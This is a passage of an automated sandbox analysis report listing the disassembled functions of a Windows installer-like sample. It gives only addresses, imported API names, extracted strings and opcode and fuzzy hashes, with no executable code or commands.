                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                                        • String ID:
                                                                                                        • API String ID: 2018477427-0
                                                                                                        • Opcode ID: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                                                        • Instruction ID: 58fb6dbac6f4d0aa410ee604506b16129162556df6f0bfffa5a6037aaea02434
                                                                                                        • Opcode Fuzzy Hash: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                                                        • Instruction Fuzzy Hash: BA114C3192C6C682E6906B54AD84376A6A0FB45F58FDC4233C9CD0B6E6CF7DE8848712
                                                                                                        Function 00007FF7E6E87BA8 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharPrev
                                                                                                        • String ID:
                                                                                                        • API String ID: 122130370-0
                                                                                                        • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                                        • Instruction ID: 9b0a7ba840be0228def96a157916da0e87504cf3a898469f44be2381ed138d1d
                                                                                                        • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                                        • Instruction Fuzzy Hash: 7001E11191C6C186FB016B11AC4136EEE90B746FA0F9C9231DAA90F7D6CA3CD4428712
                                                                                                        Function 00007FF7E6E85770 Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2962429428-0
                                                                                                        • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                                        • Instruction ID: 1eeae3b4dcb528388f8559f67dc17e3dfc6a401a54dc6db3bb4c840ed2637c1f
                                                                                                        • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                                        • Instruction Fuzzy Hash: 6CF062316187C1C2DB585F25FA80279B660FB48F58F58C236DA6B4B6D4CF39D484CB21

                                                                                                        Non-executed Functions

                                                                                                        Function 00007FF7E6E83530 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 174windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                                        • String ID: $Adv$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                        • API String ID: 3530494346-2156566418
                                                                                                        • Opcode ID: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
                                                                                                        • Instruction ID: f1d66c6ba56bfd60ab267daff9fd7d5933caa2db865ea95f52d0d44c7bb50634
                                                                                                        • Opcode Fuzzy Hash: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
                                                                                                        • Instruction Fuzzy Hash: 7C718561E287C2C6F750AB55AD0077BEA91FB95F91F9C4132CA8E0A6D5CF7CD0058722
                                                                                                        Function 00007FF7E6E812EC Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2168512254-0
                                                                                                        • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                        • Instruction ID: 2f0227c83e7e59e39f2661aae12e9bf9fa1d731cb7053a8b96c6adda6d63e5f8
                                                                                                        • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                        • Instruction Fuzzy Hash: AF516532A14AC2CAD7109F21E8442BABBA4FB8DF88F855136DA8E57794DF38D405C711
                                                                                                        Function 00007FF7E6E81C0C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                        • API String ID: 2829607268-3733053543
                                                                                                        • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                        • Instruction ID: e6aceb24a4016fbf74d453d8c20c7e15efa65dfdd5ca24ce2dfb317a8a06b84a
                                                                                                        • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                        • Instruction Fuzzy Hash: BB218672A28682C7E7109B54E8597BBFB60FB89F45F849136D68E0AA94DF3CD0448B11
                                                                                                        Function 00007FF7E6E88964 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 4104442557-0
                                                                                                        • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                        • Instruction ID: c622dd4c03e7f8aa42c4c46ec9352154b26e7e50efe2ac2d8ac8f96700bcf389
                                                                                                        • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                        • Instruction Fuzzy Hash: 5F118421A14B818AEB00EF64EC4426573A4F749B58F840A31EAAD4B7D4DF3CD1658350
                                                                                                        Function 00007FF7E6E88790 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        • Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                                                        • Instruction ID: ad71363fdba372a6b71eb08314c686a69715b00b7379f050efe81af60e3ed150
                                                                                                        • Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                                                        • Instruction Fuzzy Hash: 87B09210F35482C1D604BBA19CC516253A0BB98B14FC40832C04E881A0DE2C919B8711
                                                                                                        Function 00007FF7E6E870A8 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                        • String ID: "$:$@$RegServer
                                                                                                        • API String ID: 1203814774-4077547207
                                                                                                        • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                        • Instruction ID: 4e12acf1b0ab830f9c19da5be989816e5f06d68c99652743ba2639ccf40abd5b
                                                                                                        • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                        • Instruction Fuzzy Hash: 8C029E61A2C6C245EE60AB245C1677FEFA1BB42F40FDC0533D9DE0A6D5CE3DA8058722
                                                                                                        Function 00007FF7E6E84A60 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84A86
                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84AAA
                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84ACA
                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84AEC
                                                                                                        • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84B1B
                                                                                                        • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84B3A
                                                                                                        • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84B54
                                                                                                        • FreeLibrary.KERNEL32 ref: 00007FF7E6E84BF1
                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84C0D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                        • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                        • Instruction ID: 2f869ebdcfccfcafcebab5d10e76c8ac9772e28761a5454763b8bc4e3f7fb685
                                                                                                        • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                        • Instruction Fuzzy Hash: B4514025A29BC286E601AB15BC5427BBA90FB46F91FC84176DD8E0B7D4DF3CD448C711
                                                                                                        Function 00007FF7E6E84DCC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159memorywindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                                        • String ID: Adv$rce.
                                                                                                        • API String ID: 2929476258-1496161719
                                                                                                        • Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                        • Instruction ID: 44c210a6fce8d9da7ff7bc5e6dd288d1dd49a9d7becf0b87d0c07d93e0cb945f
                                                                                                        • Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                        • Instruction Fuzzy Hash: 5361B521E287C586FB11AB25AC003BAEA90FB59F54F885236DE8D0B7D1DF3CE5458721
                                                                                                        Function 00007FF7E6E8261C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                        • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                        • Instruction ID: d8cb47bec5a35a1020772b4fa2611bf4d7644a0460130fbb64604a4b54631e2d
                                                                                                        • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                        • Instruction Fuzzy Hash: 095182726286C186EA109B15EC443BBBBA0FB89F90F985032DA8E0B7D4DF3DD845C711
                                                                                                        Function 00007FF7E6E833F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                        • String ID: Adv
                                                                                                        • API String ID: 3785188418-921584719
                                                                                                        • Opcode ID: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                                                                        • Instruction ID: 67542f3fa90126c40bd2ee6dde17308dcc61a848c0fb50e71aa3b0d808790ffc
                                                                                                        • Opcode Fuzzy Hash: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                                                                        • Instruction Fuzzy Hash: 9C314670D247C28AE6106B64AC04376EB51FB9AF61FCC9232C99E0A3D4DF3DA445C722
                                                                                                        Function 00007FF7E6E87F04 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                        • API String ID: 3346862599-1109908249
                                                                                                        • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                        • Instruction ID: 785f7b615460204e3b8b8cc5774549bd755fe9b747ae686dceec558bece4525f
                                                                                                        • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                        • Instruction Fuzzy Hash: 52514E32E29A818AE7109B24DC4027BB7A5FB89F64F894132DA9D077D4DF3CE544CB52
                                                                                                        Function 00007FF7E6E811CC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68librarymemoryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                        • Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                                        • Instruction ID: 8ab35ba5158882d6123d333f430ecd8219c067d6859b2b0dbea515892f7e07ee
                                                                                                        • Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                                        • Instruction Fuzzy Hash: 9C314436918B858AD7109F15F8442AAFBA0FB89F50F895136DE8E47754DF3CE005CB50
                                                                                                        Function 00007FF7E6E82834 Relevance: 12.2, APIs: 8, Instructions: 153memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                        • String ID:
                                                                                                        • API String ID: 1051330783-0
                                                                                                        • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                        • Instruction ID: 67f8143177d72727b6932f9ff52a12529c8f235b64bcbd6b75176a6b94443a65
                                                                                                        • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                        • Instruction Fuzzy Hash: AA514532A146C28EEA109F159C007BAB7A4FB48F94F989132DE4D6B7D4DF39E841C761
                                                                                                        Function 00007FF7E6E82A6C Relevance: 12.1, APIs: 8, Instructions: 126COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                                        • String ID:
                                                                                                        • API String ID: 975904313-0
                                                                                                        • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                                        • Instruction ID: dd0bf3fe57a64bba49ff4294fc6b06231aacdd911e2e1cb76dadfe48b4a24672
                                                                                                        • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
